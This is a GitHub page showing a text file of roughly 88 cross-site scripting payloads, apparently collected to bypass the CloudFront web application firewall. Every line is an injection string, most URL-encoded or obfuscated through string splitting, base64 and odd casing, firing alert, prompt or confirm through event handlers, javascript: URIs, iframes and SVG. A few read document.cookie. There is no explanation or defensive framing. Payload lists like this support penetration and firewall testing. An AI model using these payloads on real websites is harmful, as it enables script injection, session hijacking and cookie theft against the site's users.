-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathcloudfront-xss.txt
88 lines (88 loc) · 8.96 KB
/
cloudfront-xss.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
"-eval("window['pro'%2B'mpt'](8)")-"
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
">'><details/open/ontoggle=confirm('XSS')>
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
%22%3E%3Csvg%20onmouseover%3d%22confirm%26%230000000040document.domain)
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
%3Ca%20href%3D%22javascript%3Awindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%22%3EClick%20me%3C/a%3E
%3Cbody%20onload%3D%22window%5B%27al%27%2B%27ert%27%5D(%27XSS%27)%22%3E
%3Cbody%20onload%3D%22window%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%22%3E
%3Cdiv%20onclick%3D%22window%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%22%3EClick%20me%3C/div%3E
%3Cdiv%20style%3D%22background%3A%20url%28javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%29%22%3E%3C/div%3E
%3Cdiv%20style%3D%22background%3Aurl%28javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%29%22%3E%3C/div%3E
%3Cdiv%20style%3D%22background-image%3Aurl('x')%3B%22%20onerror%3D%22window%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%22%3E%3C/div%3E
%3Cdiv%20style%3D%22width%3A%20expression%28window%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%29%22%3E%3C/div%3E
%3Cembed%20src%3D%22javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%22%3E
%3Ciframe%20src%3D%22data%3Atext%2Fhtml%2C%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%3C/script%3E%22%3E%3C/iframe%3E
%3Ciframe%20src%3D%22javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%22%3E%3C/iframe%3E
%3Ciframe%20src%3D%22javascript%3Awindow%5B%27al%27%2B%27ert%27%5D(%27XSS%27)%22%3E%3C/iframe%3E
%3Ciframe%20src%3D%22javascript%3Awindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%22%3E%3C/iframe%3E
%3Ciframe%20srcdoc%3D%27%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3C%2Fscript%3E%27%3E%3C/iframe%3E
%3Cimg%20src%3D%22data%3Aimage%2Fpng%3Bbase64%2CPHN2ZyBvbmxvYWQ9ImFsZXJ0KCdYU1MnKSI%2BPC9zdmc%2B%22%2F%3E
%3Cimg%20src%3D%22data%3Aimage%2Fsvg%2Bxml%2C%3Csvg%2Fonload%3Dwindow%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%3E%22%20%2F%3E
%3Cimg%20src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyBvbmxvYWQ9ImFsZXJ0KCdYW1MnKSI%2BPC9zdmc%2B%22%2F%3E
%3Cimg%20src%3D%22x%22%20onerror%3D%22window%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%22%3E
%3Cimg%20src%3D%22x%22%20onerror%3D%22window%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%22%3E
%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%22%3E
%3Cobject%20data%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4%3D%22%3E%3C/object%3E
%3Cobject%20data%3D%22javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%22%3E%3C/object%3E
%3Cobject%20data%3D%22javascript%3Awindow%5B%27al%27%2B%27ert%27%5D(%27XSS%27)%22%3E%3C/object%3E
%3Cscript%20src%3D%22data%3Atext%2Fjavascript%2C%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3C%2Fscript%3E%22%3E%3C/script%3E
%3Cscript%3E%28function%28%29%7Bwindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%3B%7D%29%28%29%3C/script%3E
%3Cscript%3EFunction('return window[\'al\'+\'ert\']')('XSS')%3C/script%3E
%3Cscript%3Econsole.log%28%27window%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%29%3B%3C/script%3E
%3Cscript%3Edocument.all%5B0%5D.innerHTML%20%3D%20%27%3Cimg%20src%3Dx%20onerror%3Dwindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3E%27%3B%3C/script%3E
%3Cscript%3Edocument.body.innerHTML%20%3D%20%27%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3C%2Fscript%3E%27%3B%3C/script%3E
%3Cscript%3Edocument.designMode%20%3D%20%27on%27%3Bdocument.body.innerHTML%20%3D%20%27%3Cimg%20src%3Dx%20onerror%3Dwindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3E%27%3B%3C/script%3E
%3Cscript%3Edocument.domain%20%3D%20%27javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%3B%3C/script%3E
%3Cscript%3Edocument.execCommand%28%27insertHTML%27%2C%20false%2C%20%27%3Cimg%20src%3Dx%20onerror%3Dwindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3E%27%29%3B%3C/script%3E
%3Cscript%3Edocument.getElementsByTagName%28%27body%27%29%5B0%5D.innerHTML%20%3D%20%27%3Cimg%20src%3Dx%20onerror%3Dwindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3E%27%3B%3C/script%3E
%3Cscript%3Edocument.location%3D%27javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%281%29%27%3B%3C/script%3E
%3Cscript%3Edocument.referrer%3D%27javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%281%29%27%3B%3C/script%3E
%3Cscript%3Edocument.write%28%27%3Cimg%20src%3Dx%20onerror%3Dwindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3E%27%29%3B%3C/script%3E
%3Cscript%3Edocument.write%28%27%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3C%2Fscript%3E%27%29%3B%3C/script%3E
%3Cscript%3Eeval%28%27window%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%29%3B%3C/script%3E
%3Cscript%3ElocalStorage.setItem%28%27x%27%2C%20%27window%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%29%3Beval%28localStorage.getItem%28%27x%27%29%29%3B%3C/script%3E
%3Cscript%3Elocation%3D%27javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%3B%3C/script%3E
%3Cscript%3Enew%20Function%28%27window%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%29%28%29%3B%3C/script%3E
%3Cscript%3EsetInterval%28function%28%29%20%7Bwindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%3B%7D%2C%201000%29%3B%3C/script%3E
%3Cscript%3EsetInterval%28function%28%29%20%7Bwindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%3B%7D%2C%201000%29%3C/script%3E
%3Cscript%3EsetTimeout%28function%28%29%20%7Bwindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3B%7D%2C%201000%29%3B%3C/script%3E
%3Cscript%3EsetTimeout%28function%28%29%20%7Bwindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%3B%7D%2C%201000%29%3C/script%3E
%3Cscript%3Evar%20blob%20%3D%20new%20Blob%28%5B%27window%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%5D%2C%20%7B%20type%3A%20%27application%2Fjavascript%27%20%7D%29%3Bvar%20url%20%3D%20URL.createObjectURL%28blob%29%3Bvar%20script%20%3D%20document.createElement%28%27script%27%29%3Bscript.src%20%3D%20url%3Bdocument.body.appendChild%28script%29%3B%3C/script%3E
%3Cscript%3Evar%20div%20%3D%20document.createElement%28%27div%27%29%3Bdiv.innerHTML%20%3D%20%27%3Cimg%20src%3Dx%20onerror%3Dwindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3E%27%3Bdocument.body.appendChild%28div%29%3B%3C/script%3E
%3Cscript%3Evar%20obj%20%3D%20%7Bfunc%3A%20function%28%29%20%7Bwindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%3B%7D%7D%3Bobj.func%28%29%3C/script%3E
%3Cscript%3Evar%20script%20%3D%20document.createElement%28%27script%27%29%3Bscript.src%20%3D%20%27data%3Atext%2Fjavascript%2C%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3C%2Fscript%3E%27%3Bdocument.head.appendChild%28script%29%3B%3C/script%3E
%3Cscript%3Evar%20script%20%3D%20document.createElement%28%27script%27%29%3Bscript.src%20%3D%20%27javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%3Bdocument.body.appendChild%28script%29%3B%3C/script%3E
%3Cscript%3Evar%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3Bxhr.open%28%27GET%27%2C%20%27data%3Atext%2Fhtml%2C%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3C%2Fscript%3E%27%2C%20true%29%3Bxhr.send%28%29%3B%3C/script%3E
%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%3C/script%3E
%3Cscript%3Ewindow%5B%27docu%27%2B%27ment%27%5D%5B%27wr%27%2B%27ite%27%5D(%60%3Cimg%20src%3Dx%20onerror%3Dwindow%5B%27al%27%2B%27ert%27%5D%281%29%3E%60)%3C/script%3E
%3Cscript%3Ewindow.eval%28%27window%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%29%3B%3C/script%3E
%3Cscript%3Ewindow.location%3D%27javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%3B%3C/script%3E
%3Cscript%3Ewindow.name%20%3D%20%27%3Cscript%3Ewindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%3C%2Fscript%3E%27%3B%3C/script%3E
%3Cscript%3Ewindow.open%28%27javascript%3Awindow%5B%27al%27%2B%27ert%27%5D%28%22XSS%22%29%27%29%3B%3C/script%3E
%3Csvg%20onload%3D%22window%5B%27al%27%2B%27ert%27%5D%28%27XSS%27%29%22%3E%3C/svg%3E
%3Csvg%20onload%3D%22window%5B%27al%27%2B%27ert%27%5D(%27XSS%27)%22%3E%3C/svg%3E
%3Csvg%20onload%3D%22window%5B%27al%27%2B%27ert%27%5D(%60XSS%60)%22%3E
"><img src=x onerror=confirm(1);>
'-eval("window['pro'%2B'mpt'](8)")-'
';a=prompt,a()//
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
<--%253cimg%20onerror=alert(1)%20src=a%253e
<iframe srcdoc=<svg/onload=alert(1)>>
<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>
<svg onload=alert%26%230000000040"1')>
<svg onload=alert(document.cookie)>
<svg onload=prompt(document.domain)> Hex: <svg onload=prompt(document.domain)>
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<xxx/x=">"/onpointerrawupdate=top[8680439..toString(30)]`1`>HOVER_ME
On\u01234\load ----> On\u01234\+OnLoAd ----> onload
ja%76ascript%3Awindow%5B%27al%27%2B%27ert%27%5D(%60XSS%60);
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
javascript:eval(atob('d2luZG93LlthbGVydF0oJ1hTUycp'));
window%5b%27al%27%2b%27ert%27%5d(%60alert%28%27XSS%27%29%60)
“>%0D%0A%0D%0A<x ‘=”foo”><x foo=’><img src=x onerror=javascript:alert(cloudfrontbypass)//’>
“><img src =q onerror=prompt(8)>